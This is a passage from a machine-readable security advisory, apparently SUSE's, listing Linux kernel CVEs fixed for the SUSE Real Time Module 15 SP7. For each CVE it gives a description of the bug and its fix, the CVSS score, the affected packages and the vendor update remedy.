"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: sof_sdw: Prevent jump to NULL add_sidecar callback\n\nIn create_sdw_dailink() check that sof_end-\u003ecodec_info-\u003eadd_sidecar\nis not NULL before calling it.\n\nThe original code assumed that if include_sidecar is true, the codec\non that link has an add_sidecar callback. But there could be other\ncodecs on the same link that do not have an add_sidecar callback.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40132",
"url": "https://www.suse.com/security/cve/CVE-2025-40132"
},
{
"category": "external",
"summary": "SUSE Bug 1253330 for CVE-2025-40132",
"url": "https://bugzilla.suse.com/1253330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40132"
},
{
"cve": "CVE-2025-40136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: hisilicon/qm - request reserved interrupt for virtual function\n\nThe device interrupt vector 3 is an error interrupt for\nphysical function and a reserved interrupt for virtual function.\nHowever, the driver has not registered the reserved interrupt for\nvirtual function. When allocating interrupts, the number of interrupts\nis allocated based on powers of two, which includes this interrupt.\nWhen the system enables GICv4 and the virtual function passthrough\nto the virtual machine, releasing the interrupt in the driver\ntriggers a warning.\n\nThe WARNING report is:\nWARNING: CPU: 62 PID: 14889 at arch/arm64/kvm/vgic/vgic-its.c:852 its_free_ite+0x94/0xb4\n\nTherefore, register a reserved interrupt for VF and set the\nIRQF_NO_AUTOEN flag to avoid that warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40136",
"url": "https://www.suse.com/security/cve/CVE-2025-40136"
},
{
"category": "external",
"summary": "SUSE Bug 1253340 for CVE-2025-40136",
"url": "https://bugzilla.suse.com/1253340"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40136"
},
{
"cve": "CVE-2025-40142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Disable bottom softirqs as part of spin_lock_irq() on PREEMPT_RT\n\nsnd_pcm_group_lock_irq() acquires a spinlock_t and disables interrupts\nvia spin_lock_irq(). This also implicitly disables the handling of\nsoftirqs such as TIMER_SOFTIRQ.\nOn PREEMPT_RT softirqs are preemptible and spin_lock_irq() does not\ndisable them. That means a timer can be invoked during spin_lock_irq()\non the same CPU. Due to synchronisations reasons local_bh_disable() has\na per-CPU lock named softirq_ctrl.lock which synchronizes individual\nsoftirq against each other.\nsyz-bot managed to trigger a lockdep report where softirq_ctrl.lock is\nacquired in hrtimer_cancel() in addition to hrtimer_run_softirq(). This\nis a possible deadlock.\n\nThe softirq_ctrl.lock can not be made part of spin_lock_irq() as this\nwould lead to too much synchronisation against individual threads on the\nsystem. To avoid the possible deadlock, softirqs must be manually\ndisabled before the lock is acquired.\n\nDisable softirqs before the lock is acquired on PREEMPT_RT.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40142",
"url": "https://www.suse.com/security/cve/CVE-2025-40142"
},
{
"category": "external",
"summary": "SUSE Bug 1253348 for CVE-2025-40142",
"url": "https://bugzilla.suse.com/1253348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40142"
},
{
"cve": "CVE-2025-40166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/guc: Check GuC running state before deregistering exec queue\n\nIn normal operation, a registered exec queue is disabled and\nderegistered through the GuC, and freed only after the GuC confirms\ncompletion. However, if the driver is forced to unbind while the exec\nqueue is still running, the user may call exec_destroy() after the GuC\nhas already been stopped and CT communication disabled.\n\nIn this case, the driver cannot receive a response from the GuC,\npreventing proper cleanup of exec queue resources. Fix this by directly\nreleasing the resources when GuC is not running.\n\nHere is the failure dmesg log:\n\"\n[ 468.089581] ---[ end trace 0000000000000000 ]---\n[ 468.089608] pci 0000:03:00.0: [drm] *ERROR* GT0: GUC ID manager unclean (1/65535)\n[ 468.090558] pci 0000:03:00.0: [drm] GT0: total 65535\n[ 468.090562] pci 0000:03:00.0: [drm] GT0: used 1\n[ 468.090564] pci 0000:03:00.0: [drm] GT0: range 1..1 (1)\n[ 468.092716] ------------[ cut here ]------------\n[ 468.092719] WARNING: CPU: 14 PID: 4775 at drivers/gpu/drm/xe/xe_ttm_vram_mgr.c:298 ttm_vram_mgr_fini+0xf8/0x130 [xe]\n\"\n\nv2: use xe_uc_fw_is_running() instead of xe_guc_ct_enabled().\n As CT may go down and come back during VF migration.\n\n(cherry picked from commit 9b42321a02c50a12b2beb6ae9469606257fbecea)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40166",
"url": "https://www.suse.com/security/cve/CVE-2025-40166"
},
{
"category": "external",
"summary": "SUSE Bug 1253433 for CVE-2025-40166",
"url": "https://bugzilla.suse.com/1253433"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40166"
},
{
"cve": "CVE-2025-40177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Fix bootlog initialization ordering\n\nAs soon as we queue MHI buffers to receive the bootlog from the device,\nwe could be receiving data. Therefore all the resources needed to\nprocess that data need to be setup prior to queuing the buffers.\n\nWe currently initialize some of the resources after queuing the buffers\nwhich creates a race between the probe() and any data that comes back\nfrom the device. If the uninitialized resources are accessed, we could\nsee page faults.\n\nFix the init ordering to close the race.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40177",
"url": "https://www.suse.com/security/cve/CVE-2025-40177"
},
{
